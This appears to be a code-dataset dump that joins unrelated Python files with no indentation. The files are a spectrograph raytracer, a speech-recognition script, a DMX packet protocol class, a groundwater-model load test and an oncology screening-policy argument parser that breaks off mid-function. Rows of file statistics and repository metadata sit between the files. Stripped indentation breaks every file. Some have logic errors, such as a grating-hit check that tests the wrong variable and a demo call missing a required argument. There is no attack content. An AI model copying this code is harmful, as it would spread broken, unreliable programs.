# vim: set fileencoding=utf-8 ts=4 sts=4 sw=4 et tw=80 :
#
# Some useful routines to aid in vector raytracing. These are helpful when
# figuring out 3-D positioning of light rays through a spectrograph.
#
# Background information on the mathematics can be found at:
# https://en.wikipedia.org/wiki/Snell%27s_law#Vector_form
# https://en.wikipedia.org/wiki/Line%E2%80%93plane_intersection
#
# Rob Siverd
# Created: 2019-02-18
# Last modified: 2019-03-29
#--------------------------------------------------------------------------
#**************************************************************************
#--------------------------------------------------------------------------
## Current version:
__version__ = "0.3.0"
## Python version-agnostic module reloading:
try:
reload # Python 2.7
except NameError:
try:
from importlib import reload # Python 3.4+
except ImportError:
from imp import reload # Python 3.0 - 3.3
## Modules:
import os
import sys
import copy
import time
import numpy as np
#from numpy.lib.recfunctions import append_fields
#import datetime as dt
#from dateutil import parser as dtp
#import scipy.linalg as sla
#import scipy.signal as ssig
#import scipy.ndimage as ndi
#import scipy.optimize as opti
#import scipy.interpolate as stp
#import scipy.spatial.distance as ssd
#from functools import partial
#from collections import OrderedDict
#import multiprocessing as mp
#np.set_printoptions(suppress=True, linewidth=160)
#import pandas as pd
#import statsmodels.api as sm
#import statsmodels.formula.api as smf
#from statsmodels.regression.quantile_regression import QuantReg
#import PIL.Image as pli
#import seaborn as sns
#import cmocean
#import theil_sen as ts
#import window_filter as wf
#import itertools as itt
##--------------------------------------------------------------------------##
## Reflection and refraction in 3 dimensions (vector forms):
def calc_surface_vectors(v_incident, surf_norm, n1_n2_ratio):
cti = -1.0 * np.dot(v_incident, surf_norm) # cos(theta_i)
nnr = n1_n2_ratio
v_reflect = v_incident + 2. * cti * surf_norm
smult = nnr*cti - np.sqrt(1.0 - nnr**2 * (1.0 - cti**2))
v_refract = nnr * v_incident + smult * surf_norm
return v_reflect, v_refract
def refracted_ray(v_incident, surf_norm, n1_n2_ratio):
cti = -1.0 * np.dot(v_incident, surf_norm) # cos(theta_i)
nnr = n1_n2_ratio
smult = nnr*cti - np.sqrt(1.0 - nnr**2 * (1.0 - cti**2))
v_refract = nnr * v_incident + smult * surf_norm
return v_refract
##--------------------------------------------------------------------------##
## Intersection of a line and plane. In this model, both lines and planes are
## described by (point, vector pairs). In the case of a line, the vector points
## "along" the line. For the plane, the vector is surface normal.
#def line_plane_intersection(line, plane):
#lpoint, lvector = line['point'], line['vector']
#ppoint, pvector = plane['point'], plane['vector']
#def line_plane_intersection(lpoint, lvector, ppoint, pnormal):
# """
# All inputs should be 3-element numpy ndarray type. The case of parallel
# line and plane should be handled ~correctly.
#
# lpoint - any point (x, y, z) on the line
# lvector - any vector (dx, dy, dz) along the line
# ppoint - any point (x, y, z) on the plane
# pnormal - any vector (dx, dy, dz) normal to plane surface
#
# Returns:
# intersection - (x, y, z) point of intersection
# """
#
# pl_sep = np.dot(ppoint - lpoint, pnormal)
# angsep = np.dot(lvector, pnormal)
# # Parallel line/plane is handled separately:
# if (angsep == 0.0):
# sys.stderr.write("WARNING: line and plane are PARALLEL!\n")
# if (pl_sep == 0.0):
# sys.stderr.write("Line lies within plane!\n")
# return lpoint
# #return (0.0, lpoint)
# else:
# sys.stderr.write("Line and plane do not intersect!\n")
# return None
# #return None, None
# # If not parallel, get distance and intersection:
# distance = pl_sep / angsep
# return lpoint + distance * lvector
# #isect = lpoint + distance * lvector
# #truedist = np.sqrt(np.sum((isect - lpoint)**2))
# #sys.stderr.write("truedist: %10.5f\n" % truedist)
# #return distance, isect
##--------------------------------------------------------------------------##
## Point-in-polygon test routine. This will be useful to check whether a
## calculated line-plane intersection point resides within the boundaries of
## a face as defined by its vertices.
#def point_in_polygon(point, vtx_list):
# return
##--------------------------------------------------------------------------##
##------------------ Grating Diffraction ----------------##
##--------------------------------------------------------------------------##
##--------------------------------------------------------------------------##
##------------------ End-to-end Spectrograph Raytrace ----------------##
##--------------------------------------------------------------------------##
class E2ERT(object):
def __init__(self, prism, grating, ccd, vlevel=1):
#self._faces = [x for x in face_list]
#self._faces = copy.deepcopy(face_list)
self._probj = prism
self._grobj = grating
self._cmobj = ccd
self._prf1 = self._probj.get_face('face1')
self._prf2 = self._probj.get_face('face2')
# Feedback messaging:
self._stream = sys.stderr
self._vlevel = vlevel
return
def _vlwrite(self, vlmin, msgtxt):
if self._vlevel >= vlmin:
self._stream.write(msgtxt)
return
def follow(self, xyz0, traj0, wl_um, spec_order):
# collect useful pieces:
prf1 = self._probj.get_face('face1')
prf2 = self._probj.get_face('face2')
p_n1n2 = self._probj._n1n2_ratio(wl_um) # n_glass / n_air
grbot = self._grobj.get_face('bot')
sensor = self._cmobj.get_face('front')
result = {'complete':False, 'ccdxy':None, 'path':[(xyz0, traj0)],
'wlen_um':wl_um, 'specmod':None}
#light_path = [(xyz0, traj0)]
# -------------------------------------------------------
# Enter prism through face1 (point + trajectory):
valid, f1_isect = prf1.get_intersection(xyz0, traj0)
if not valid:
self._vlwrite(1, "Input beam missed prism!\n")
return result
#return light_path
new_traj = calc_surface_vectors(traj0, prf1['normal'], p_n1n2)[1]
#light_path.append((f1_isect, new_traj))
result['path'].append((f1_isect, new_traj))
# Exit through prism face2 (point + trajectory):
valid, f2_isect = prf2.get_intersection(f1_isect, new_traj)
if not valid:
self._vlwrite(1, "Beam failed to exit prism through face2!\n")
return result
#return light_path
new_traj = calc_surface_vectors(new_traj,
-prf2['normal'], 1. / p_n1n2)[1]
#light_path.append((f2_isect, new_traj))
result['path'].append((f2_isect, new_traj))
# -------------------------------------------------------
# Intersect grating and change direction (diffract):
hits_grating, gr_isect = grbot.get_intersection(f2_isect, new_traj)
if not valid:
self._vlwrite(1, "Light ray misses grating!\n")
return result
#return light_path
valid, diffr_vec = \
self._grobj.diffracted_ray(new_traj, wl_um, spec_order)
if not valid:
#light_path.append((gr_isect, None))
result['path'].append((gr_isect, None))
self._vlwrite(1, "No valid diffracted beam from grating!\n")
return result
#return light_path
result['path'].append((gr_isect, diffr_vec))
#light_path.append((gr_isect, diffr_vec))
# -------------------------------------------------------
# Re-enter prism through face2 (point + trajectory):
hits_prism, f2_isect = prf2.get_intersection(gr_isect, diffr_vec)
if not hits_prism:
self._vlwrite(1, "Diffracted ray does not return to prism!\n")
return result
#return light_path
new_traj = calc_surface_vectors(diffr_vec, prf2['normal'], p_n1n2)[1]
result['path'].append((f2_isect, new_traj))
#light_path.append((f2_isect, new_traj))
# Exit through prism face1 (point + trajectory):
valid, f1_isect = prf1.get_intersection(f2_isect, new_traj)
if not valid:
self._vlwrite(1, "Beam failed to exit prism through face1!\n")
return result
#return light_path
new_traj = calc_surface_vectors(new_traj,
-prf1['normal'], 1. / p_n1n2)[1]
result['path'].append((f1_isect, new_traj))
#light_path.append((f1_isect, new_traj))
# -------------------------------------------------------
# Check for intersection with CCD plane:
valid, cam_isect = sensor.get_intersection(f1_isect, new_traj)
if not valid:
self._vlwrite(1, "Beam misses CCD sensor!\n")
#return light_path
return result
#sys.stderr.write("cam_isect: %s\n" % str(cam_isect))
result['path'].append((cam_isect, None))
result['ccdxy'] = sensor._xyz2uv_s(cam_isect)
result['complete'] = True
result['specmod'] = [wl_um] + result['ccdxy'].tolist()
#result['summary'] = [wl_um] +
#light_path.append((cam_isect, None))
#light_path.append((cam_isect, native_isect))
#sys.stderr.write("dir(sensor): %s\n" % str(dir(sensor)))
return result
#return light_path
######################################################################
# CHANGELOG (raytrace_tools.py):
#---------------------------------------------------------------------
#
# 2019-02-18:
# -- Increased __version__ to 0.1.0.
# -- First created raytrace_tools.py.
#
| 39.960938 | 79 | 0.559042 | 1,230 | 10,230 | 4.479675 | 0.282114 | 0.024138 | 0.026134 | 0.02922 | 0.319601 | 0.261162 | 0.219782 | 0.158439 | 0.158439 | 0.14265 | 0 | 0.021054 | 0.224633 | 10,230 | 255 | 80 | 40.117647 | 0.673601 | 0.538612 | 0 | 0.340426 | 0 | 0 | 0.086323 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.053191 | false | 0 | 0.085106 | 0 | 0.276596 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62288422254e8b5f4d472cc0028e1fa65576d9c6 | 1,431 | py | Python | dev/speech3.py | nigamarpit/Restaurant-Genie | 33fcd988d59a7343fb62930431358539d2c8f662 | [
"Apache-2.0"
] | 1 | 2016-12-05T01:29:52.000Z | 2016-12-05T01:29:52.000Z | dev/speech3.py | nigamarpit/Restaurant-Genie | 33fcd988d59a7343fb62930431358539d2c8f662 | [
"Apache-2.0"
] | null | null | null | dev/speech3.py | nigamarpit/Restaurant-Genie | 33fcd988d59a7343fb62930431358539d2c8f662 | [
"Apache-2.0"
] | 1 | 2020-04-24T17:26:59.000Z | 2020-04-24T17:26:59.000Z | import sys
import speech_recognition as sr
from os import environ, path,getcwd
from pocketsphinx.pocketsphinx import *
from sphinxbase.sphinxbase import *
# obtain audio from the microphone
r = sr.Recognizer()
with sr.Microphone() as source:
print("Say something!")
audio = r.listen(source)
#with open('microphone-results.raw', 'wb') as f:
# f.write(audio.get_raw_data())
with open("microphone-results.wav", "wb") as f:
f.write(audio.get_wav_data())
DIR=getcwd()
#input(DIR)
config = Decoder.default_config()
config.set_string('-hmm', path.join(DIR, 'pocketsphinx-python\pocketsphinx\model\en-us'))
#config.set_string('-lm', path.join(DIR, 'pocketsphinx-python\pocketsphinx\model\en-us.lm.bin'))
#config.set_string('-dict', path.join(DIR, 'pocketsphinx-python\pocketsphinx\model\cmudict-en-us.dict'))
#config.set_string('-lm', path.join(DIR, 'LanguageModel\1945.lm'))
#input(path.join(DIR, 'LanguageModel\lm1945.dict'))
lm=path.join(DIR, 'model.bin')
d=path.join(DIR, '2859.dic')
#input(lm)
#input(d)
config.set_string('-lm',lm)
config.set_string('-dict',d)
config.set_string('-logfn','nul')
decoder = Decoder(config)
decoder.start_utt()
stream = open(path.join(DIR, 'microphone-results.wav'), 'rb')
while True:
buf = stream.read(1024)
if buf:
decoder.process_raw(buf, False, False)
else:
break
decoder.end_utt()
#print(list(decoder.seg()))
print ('Best hypothesis segments: ', [seg.word for seg in decoder.seg()])
| 30.446809 | 104 | 0.733054 | 217 | 1,431 | 4.760369 | 0.37788 | 0.061955 | 0.085189 | 0.066796 | 0.221684 | 0.221684 | 0.221684 | 0.096805 | 0.096805 | 0 | 0 | 0.01227 | 0.088749 | 1,431 | 46 | 105 | 31.108696 | 0.779908 | 0.331936 | 0 | 0 | 0 | 0 | 0.180085 | 0.09322 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62292ac12d3d2f7e1949d92468b7d3d21b1fa86b | 4,980 | py | Python | DMX.py | rookies/dmx2serial | 8862998132a46712a48cce76f12b6bbc3447112f | [
"MIT"
] | null | null | null | DMX.py | rookies/dmx2serial | 8862998132a46712a48cce76f12b6bbc3447112f | [
"MIT"
] | null | null | null | DMX.py | rookies/dmx2serial | 8862998132a46712a48cce76f12b6bbc3447112f | [
"MIT"
] | null | null | null | #!/usr/bin/python3
from enum import IntEnum
import struct
class Flag(IntEnum):
Payload = 0b10000000
Success = 0b01000000
Resend = 0b00100000
Configurate = 0b00000100
Hello = 0b00000010
Parity = 0b00000001
class FlagSet(object):
def __init__(self, flags=0x00):
flags = int(flags)
if flags < 0 or flags > 255:
raise ValueError("Invalid flags.")
self.flags = flags
def __str__(self):
return "{}({})".format(self.__class__.__name__, ",".join(['%s=%s' % (k, v) for (k, v) in self.asDict().items()]))
def asDict(self):
res = {}
for f in Flag:
if self.isSet(f):
res[f.name] = 1
else:
res[f.name] = 0
return res
def getBitfield(self):
return self.flags
def set(self, flag):
if not isinstance(flag, Flag):
raise ValueError("Please use instance of Flag.")
self.flags |= flag
def unset(self, flag):
if not isinstance(flag, Flag):
raise ValueError("Please use instance of Flag.")
self.flags &= ~flag
def toggle(self, flag):
if not isinstance(flag, Flag):
raise ValueError("Please use instance of Flag.")
self.flags ^= flag
def isSet(self, flag):
if not isinstance(flag, Flag):
raise ValueError("Please use instance of Flag.")
return ((self.flags & flag) is not 0)
class Packet(object):
checksum = 0x0
def __init__(self, version=0x00, flags=0x00, universe=0x00, channel=0x0000, value=0x00):
self.setVersion(version)
self.flags = FlagSet(flags)
self.setUniverse(universe)
self.setChannel(channel)
self.setValue(value)
def __str__(self):
return "{}(version={},flags={},universe={},channel={},value={},checksum={})".format(self.__class__.__name__, self.version, str(self.flags), self.universe, self.channel, self.value, self.checksum)
def getVersion(self): return self.version
def getFlags(self): return self.flags
def getUniverse(self): return self.universe
def getChannel(self): return self.channel
def getValue(self): return self.value
def setVersion(self, version):
version = int(version)
if version < 0 or version > 255:
raise ValueError("Invalid version.")
self.version = version
def setUniverse(self, universe):
universe = int(universe)
if universe < 0 or universe > 255:
raise ValueError("Invalid universe.")
self.universe = universe
def setChannel(self, channel):
channel = int(channel)
if channel < 0 or channel > 65535:
raise ValueError("Invalid channel.")
self.channel = channel
def setValue(self, value):
value = int(value)
if value < 0 or value > 255:
raise ValueError("Invalid value.")
self.value = value
def calculateParity(self):
self.flags.unset(Flag.Parity)
odd = (bin(self.version).count("1") + bin(self.flags.getBitfield()).count("1")) % 2
if odd is 1:
self.flags.set(Flag.Parity)
def checkParity(self):
odd = (bin(self.version).count("1") + bin(self.flags.getBitfield()).count("1")) % 2
return (odd is 0)
def calculateChecksum(self):
pass #TODO#
def checkChecksum(self):
pass #TODO#
def serialize(self):
if self.flags.isSet(Flag.Payload):
return struct.pack(
"<BBBHB",
self.version,
self.flags.getBitfield(),
self.universe,
self.channel,
self.value
)
else:
return struct.pack(
"<BB",
self.version,
self.flags.getBitfield()
)
def deserialize(self, data):
pass #TODO#
class PacketFactory(object):
@staticmethod
def createHsAsk():
return Packet(flags=(Flag.Hello | Flag.Parity))
@staticmethod
def createHsAnswer(success, resend):
p = Packet(version=1, flags=Flag.Hello)
if success:
p.flags.set(Flag.Success)
if resend:
p.flags.set(Flag.Resend)
p.calculateParity()
return p
@staticmethod
def createChSet(universe, channel, value):
p = Packet(version=1, flags=Flag.Payload, universe=universe, channel=channel, value=value)
p.calculateChecksum()
return p
@staticmethod
def createChAnswer(success, resend):
p = Packet(version=1)
if success:
p.flags.set(Flag.Success)
if resend:
p.flags.set(Flag.Resend)
p.calculateParity()
return p
@staticmethod
def createCfgAnswer(success, resend):
p = Packet(version=1, flags=Flag.Configurate)
if success:
p.flags.set(Flag.Success)
if resend:
p.flags.set(Flag.Resend)
p.calculateParity()
return p
if __name__ == "__main__":
#p = Packet(version=1, flags=(Flag.Payload | Flag.Hello))
#print(p)
#print(p.checkParity())
#p.calculateParity()
#print(p)
#print(p.checkParity())
print(" HsAsk():", PacketFactory.createHsAsk())
print(" HsAnswer(1):", PacketFactory.createHsAnswer(True))
print(" HsAnswer(0):", PacketFactory.createHsAnswer(False))
print(" ChSet(...):", PacketFactory.createChSet(7, 10, 255))
print(" ChAnswer(1):", PacketFactory.createChAnswer(True))
print(" ChAnswer(0):", PacketFactory.createChAnswer(False))
print("CfgAnswer(1):", PacketFactory.createCfgAnswer(True))
print("CfgAnswer(0):", PacketFactory.createCfgAnswer(False))
| 26.210526 | 197 | 0.683333 | 642 | 4,980 | 5.238318 | 0.182243 | 0.045495 | 0.024978 | 0.023194 | 0.32025 | 0.275052 | 0.247696 | 0.22926 | 0.207255 | 0.207255 | 0 | 0.030848 | 0.173293 | 4,980 | 189 | 198 | 26.349206 | 0.786009 | 0.032932 | 0 | 0.294118 | 0 | 0 | 0.081824 | 0.01395 | 0 | 0 | 0.006038 | 0.005291 | 0 | 1 | 0.196078 | false | 0.019608 | 0.013072 | 0.058824 | 0.366013 | 0.052288 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62298e624275292f5e8c6bb45a61f981abe08392 | 2,277 | py | Python | autotest/t037_test.py | hansonmcoombs/flopy | 49398983c36d381992621d5bf698ea7f78fc0014 | [
"CC0-1.0",
"BSD-3-Clause"
] | null | null | null | autotest/t037_test.py | hansonmcoombs/flopy | 49398983c36d381992621d5bf698ea7f78fc0014 | [
"CC0-1.0",
"BSD-3-Clause"
] | null | null | null | autotest/t037_test.py | hansonmcoombs/flopy | 49398983c36d381992621d5bf698ea7f78fc0014 | [
"CC0-1.0",
"BSD-3-Clause"
] | null | null | null | """
Some basic tests for SWR2 load.
"""
import os
import pymake
import pytest
from ci_framework import FlopyTestSetup, base_test_dir
import flopy
base_dir = base_test_dir(__file__, rel_path="temp", verbose=True)
swi_path = os.path.join("..", "examples", "data", "mf2005_test")
cpth = os.path.join("temp", "t037")
mf_items = ["swiex1.nam", "swiex2_strat.nam", "swiex3.nam"]
exe_name = "mf2005"
v = flopy.which(exe_name)
run = True
if v is None:
run = False
def load_swi(mfnam):
name = mfnam.replace(".nam", "")
model_ws = f"{base_dir}_{name}"
test_setup = FlopyTestSetup(verbose=True, test_dirs=model_ws)
pymake.setup(os.path.join(swi_path, mfnam), model_ws)
m = flopy.modflow.Modflow.load(
mfnam, model_ws=model_ws, verbose=True, exe_name=exe_name
)
assert m.load_fail is False
if run:
try:
success, buff = m.run_model(silent=False)
except:
success = False
assert success, "base model run did not terminate successfully"
fn0 = os.path.join(model_ws, mfnam)
# write free format files -
# won't run without resetting to free format - evt external file issue
m.free_format_input = True
# rewrite files
model_ws2 = os.path.join(model_ws, "flopy")
m.change_model_ws(
model_ws2, reset_external=True
) # l1b2k_bath wont run without this
m.write_input()
if run:
try:
success, buff = m.run_model(silent=False)
except:
success = False
assert success, "base model run did not terminate successfully"
fn1 = os.path.join(model_ws2, mfnam)
if run:
fsum = os.path.join(
model_ws, f"{os.path.splitext(mfnam)[0]}.budget.out"
)
try:
success = pymake.compare_budget(
fn0, fn1, max_incpd=0.1, max_cumpd=0.1, outfile=fsum
)
except:
success = False
print("could not perform budget comparison")
assert success, "budget comparison failure"
return
@pytest.mark.parametrize(
"namfile",
mf_items,
)
def test_mf2005swi2load(namfile):
load_swi(namfile)
return
if __name__ == "__main__":
for namfile in mf_items:
load_swi(namfile)
| 23.71875 | 74 | 0.629776 | 308 | 2,277 | 4.454545 | 0.37013 | 0.045918 | 0.05102 | 0.043732 | 0.196064 | 0.158892 | 0.158892 | 0.158892 | 0.158892 | 0.158892 | 0 | 0.020262 | 0.263065 | 2,277 | 95 | 75 | 23.968421 | 0.797378 | 0.076416 | 0 | 0.30303 | 0 | 0 | 0.147706 | 0.018642 | 0 | 0 | 0 | 0 | 0.060606 | 1 | 0.030303 | false | 0 | 0.075758 | 0 | 0.136364 | 0.015152 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
622afff6f65764669a8a396c649e02dffa29baaa | 14,868 | py | Python | oncopolicy/utils/parsing.py | yala/Tempo | bf3e0e78d64869bb2079c582a4a35982f78386ad | [
"MIT"
] | 6 | 2022-01-15T11:57:19.000Z | 2022-02-13T21:15:22.000Z | oncopolicy/utils/parsing.py | yala/Tempo | bf3e0e78d64869bb2079c582a4a35982f78386ad | [
"MIT"
] | null | null | null | oncopolicy/utils/parsing.py | yala/Tempo | bf3e0e78d64869bb2079c582a4a35982f78386ad | [
"MIT"
] | 2 | 2022-02-02T13:09:29.000Z | 2022-02-18T07:06:19.000Z | import pickle
import numpy as np
import argparse
import torch
import os
import pwd
from oncopolicy.datasets.factory import get_dataset_class
from oncopolicy.utils.generic import AverageMeter
from oncopolicy.metrics.factory import get_metric_keys
BATCH_SIZE_SPLIT_ERR = 'batch_size (={}) should be a multiple of batch_splits (={})'
POSS_VAL_NOT_LIST = 'Flag {} has an invalid list of values: {}. Length of list must be >=1'
RACE_CODE_TO_NAME = { 1: 'White',
2: 'African American',
3: 'Other',
4: 'Asian or Pacific Islander',
5: 'Other',
6: 'Other',
7: 'Other',
8: 'Other',
9: 'Asian or Pacific Islander',
10: 'Asian or Pacific Islander',
11: 'Asian or Pacific Islander',
12: 'Asian or Pacific Islander',
13: 'Asian or Pacific Islander'
}
def parse_dispatcher_config(config):
'''
Parses an experiment config, and creates jobs. For flags that are expected to be a single item,
but the config contains a list, this will return one job for each item in the list.
:config - experiment_config
returns: jobs - a list of flag strings, each of which encapsulates one job.
*Example: --train --cuda --dropout=0.1 ...
returns: experiment_axies - axies that the grid search is searching over
'''
jobs = [""]
experiment_axies = []
search_spaces = config['search_space']
# Support a list of search spaces, convert to length one list for backward compatiblity
if not isinstance(search_spaces, list):
search_spaces = [search_spaces]
for search_space in search_spaces:
# Go through the tree of possible jobs and enumerate into a list of jobs
for ind, flag in enumerate(search_space):
possible_values = search_space[flag]
if len(possible_values) > 1:
experiment_axies.append(flag)
children = []
if len(possible_values) == 0 or type(possible_values) is not list:
raise Exception(POSS_VAL_NOT_LIST.format(flag, possible_values))
for value in possible_values:
for parent_job in jobs:
if type(value) is bool:
if value:
new_job_str = "{} --{}".format(parent_job, flag)
else:
new_job_str = parent_job
elif type(value) is list:
val_list_str = " ".join([str(v) for v in value])
new_job_str = "{} --{} {}".format(parent_job, flag,
val_list_str)
else:
new_job_str = "{} --{} {}".format(parent_job, flag, value)
children.append(new_job_str)
jobs = children
return jobs, experiment_axies
def parse_args():
parser = argparse.ArgumentParser(description='OncoPolicy Classifier')
# setup
parser.add_argument('--run_prefix', default="snapshot", help="what to name this type of model run")
parser.add_argument('--train', action='store_true', default=False, help='Whether or not to train model')
parser.add_argument('--test', action='store_true', default=False, help='Whether or not to run model on test set')
parser.add_argument('--do_subgroup_eval', action='store_true', default=False, help="Rerun test on diff subgroups")
parser.add_argument('--dev', action='store_true', default=False, help='Whether or not to run model on dev set')
parser.add_argument('--seed', type=int, default=0, help='Random seed')
# data
parser.add_argument('--task', type=str, default='screening', help="Type of task. fit a screening policy or learn a risk progression model")
parser.add_argument('--risk_dimension', type=int, default=5, help='Max followup risk is defined over. 5 for 5 years')
parser.add_argument('--recallibrate', action='store_true', default=False, help="Recallibrate mirai probs per test set.")
parser.add_argument('--max_screening_interval_in_6mo_counts', type=int, default=6, help='Max half-years before next screening. 6 for 3 years, 4 for 2 years, etc.')
parser.add_argument('--min_screening_interval_in_6mo_counts', type=int, default=1, help='Min half-years before next screening. 1 for 6 months, etc.')
parser.add_argument('--dataset', default='mnist', help='Name of dataset from dataset factory to use [default: mnist]')
parser.add_argument('--use_all_trajec_for_eval', action='store_true', default=False, help='Whether or not to use all starting points in dev set')
parser.add_argument('--num_workers', type=int, default=8, help='num workers for each data loader [default: 8]')
parser.add_argument('--metadata_pickle_path', type=str, default='raw_data/ki_trajectories/mirai_trajectories.p.with_splits', help='path of metadata pickle file.')
parser.add_argument('--metadata_csv_path', type=str, default='raw_data/cgmh_trajectories/cancer_dates.csv', help='path of auxillary information of trajectories.')
parser.add_argument('--subgroup_metadata_path', type=str, default='/data/rsg/mammogram/pgmikhael/MGH_ACC_TO_X.pkl', help='path of metadata pickle file.')
parser.add_argument('--get_conf_intervals', action='store_true', default=False, help="Use conf intervals in reporting all metrics")
parser.add_argument('--use_callibrator', action='store_true', default=False, help="Use callibrator before using MSE metrics")
parser.add_argument('--callibrator_path', type=str, default='raw_data/MIRAI_FULL_PRED_RF.callibrator.p', help='where to load the callibrator')
# sampling
parser.add_argument('--class_bal', action='store_true', default=False, help='Wether to apply a weighted sampler to balance between the classes on each batch.')
# regularization
parser.add_argument('--envelope_margin_loss_lambda', type=float, default=0.5, help='lambda to weigh the Envelope margin loss.')
parser.add_argument('--envelope_margin', type=float, default=0.5, help='Size of the envelope margin loss.')
parser.add_argument('--envelope_inference', action='store_true', default=False, help="Search envelope of preferences for inference")
parser.add_argument('--imitate_oracle', action='store_true', default=False, help="Switch model to do imitation learning only.")
parser.add_argument('--sample_all_oracle_transitions', action='store_true', default=False, help="Sample all transitions instead of oracle transitions only.")
parser.add_argument('--homotopy_decay_rate', type=float, default=0.99, help='How to scale homtopy lambda every reset.')
# learning
parser.add_argument('--optimizer', type=str, default="adam", help='optimizer to use [default: adam]')
parser.add_argument('--init_lr', type=float, default=0.001, help='initial learning rate [default: 0.001]')
parser.add_argument('--momentum', type=float, default=0, help='Momentum to use with SGD')
parser.add_argument('--lr_decay', type=float, default=0.5, help='initial learning rate [default: 0.5]')
parser.add_argument('--weight_decay', type=float, default=0, help='L2 Regularization penaty [default: 0]')
parser.add_argument('--patience', type=int, default=10, help='number of epochs without improvement on dev before halving learning rate and reloading best model [default: 5]')
parser.add_argument('--turn_off_model_reset', action='store_true', default=False, help="Don't reload the model to last best when reducing learning rate")
parser.add_argument('--sample_random_preferences', action='store_true', default=False, help="Sample preferences at random with unit mean and a truncated guassian")
parser.add_argument('--fixed_preference', nargs='*', default=[1.0, 3.0], help='List of preference weights')
parser.add_argument('--num_estimates_for_dev', type=int, default=10, help='Number of loops through dev set to estimate randomized reward')
parser.add_argument('--tuning_metric', type=str, default='loss', help='Metric to judge dev set results. Possible options include auc, loss, accuracy [default: loss]')
parser.add_argument('--epochs', type=int, default=256, help='number of epochs for train [default: 256]')
parser.add_argument('--max_batches_per_train_epoch', type=int, default=10000, help='max batches to per train epoch. [default: 10000]')
parser.add_argument('--max_batches_per_dev_epoch', type=int, default=10000, help='max batches to per dev epoch. [default: 10000]')
parser.add_argument('--batch_size', type=int, default=32, help='batch size for training [default: 128]')
parser.add_argument('--batch_splits', type=int, default=1, help='Splits batch size into smaller batches in order to fit gpu memmory limits. Optimizer step is run only after one batch size is over. Note: batch_size/batch_splits should be int [default: 1]')
parser.add_argument('--dropout', type=float, default=0.25, help='Amount of dropout to apply on last hidden layer [default: 0.25]')
parser.add_argument('--replay_size', type=int, default=10000, help='Amount transitions to store in experience replay size')
parser.add_argument('--reward_decay_lambda', type=float, default=.99, help='How to weight rewards in one transition from here')
parser.add_argument('--epsilon', type=float, default=.1, help='How often to take random actions to explore')
parser.add_argument('--max_oracle_prob', type=float, default=0.50, help='Max how often to take oracle action to explore with oracle')
parser.add_argument('--min_oracle_prob', type=float, default=0.10, help='Min how often to take oracle action to explore with oracle')
parser.add_argument('--oracle_decay_rate', type=float, default=0.50, help='How much to decay oracle prob on every reset')
parser.add_argument('--reset_rate', type=int, default=500, help='How many steps before reset target model, decay epsilon etc.')
parser.add_argument('--save_dir', type=str, default='snapshot', help='where to dump the model')
parser.add_argument('--results_path', type=str, default='logs/snapshot', help='where to save the result logs')
parser.add_argument('--no_tuning_on_dev', action='store_true', default=False, help='Train without tuning on dev (no adaptive lr reduction or saving best model based on dev)')
parser.add_argument('--lr_reduction_interval', type=int, default=1, help='Number of epochs to wait before reducing lr when training without adaptive lr reduction.')
parser.add_argument('--data_fraction', type=float, default=1.0, help='Fraction of data to use, i.e 1.0 for all and 0 for none. Used for learning curve analysis.')
# model
parser.add_argument('--screening_model_name', type=str, default='annual_guideline', help="Form of screening policy model, i.e annual_guideline, some nn, etc.")
parser.add_argument('--screening_snapshot', type=str, default=None, help='filename of model snapshot to load[default: None]')
parser.add_argument('--progression_model_name', type=str, default='last_observed_risk', help="Form of progression model, i.e last_observed_risk, some nn, etc, etc.")
parser.add_argument('--progression_snapshot', type=str, default=None, help='filename of model snapshot to load[default: None]')
parser.add_argument('--hidden_dim', type=int, default=50, help='Hidden dim of linear layers in progression or screening model')
parser.add_argument('--num_layers', type=int, default=1, help='Number of layers used neural models.')
parser.add_argument('--teacher_forcing_for_progression', action='store_true', default=False, help='Use teacher forcing when training risk progression model')
parser.add_argument('--max_early_detection_benefit', type=int, default=18, help='Max number of months that yields an early detection benefit.')
parser.add_argument('--use_pessimistic_detection_definition', action='store_true', default=False, help='Consider only screens in max window to offer benefit')
# device
parser.add_argument('--cuda', action='store_true', default=False, help='enable the gpu')
parser.add_argument('--num_gpus', type=int, default=1, help='Num GPUs to use in data_parallel.')
parser.add_argument('--data_parallel', action='store_true', default=False, help='spread batch size across all available gpus. Set to false when using model parallelism. The combo of model and data parallelism may result in unexpected behavior')
args = parser.parse_args()
# Set args particular to dataset
get_dataset_class(args).set_args(args)
args.cuda = args.cuda and torch.cuda.is_available()
args.device = 'cuda' if args.cuda else 'cpu'
args.unix_username = pwd.getpwuid( os.getuid() )[0]
args.metrics = sorted(get_metric_keys(screen_only = True))
args.fixed_preference = [float(pref) for pref in args.fixed_preference ]
args.step_index = 1
assert len(args.fixed_preference) == len(args.metrics)
# learning initial state
args.optimizer_state = None
args.current_epoch = None
args.lr = None
args.epoch_stats = None
args.step_indx = 1
if args.use_callibrator:
args.callibrator = pickle.load(open(args.callibrator_path,'rb'))
# Check whether certain args or arg combinations are valid
validate_args(args)
np.random.seed(args.seed)
args.average_meter_dict = {'loss': AverageMeter()}
return args
def load_subgroups(args):
metadata = pickle.load(open(args.subgroup_metadata_path,'rb'))
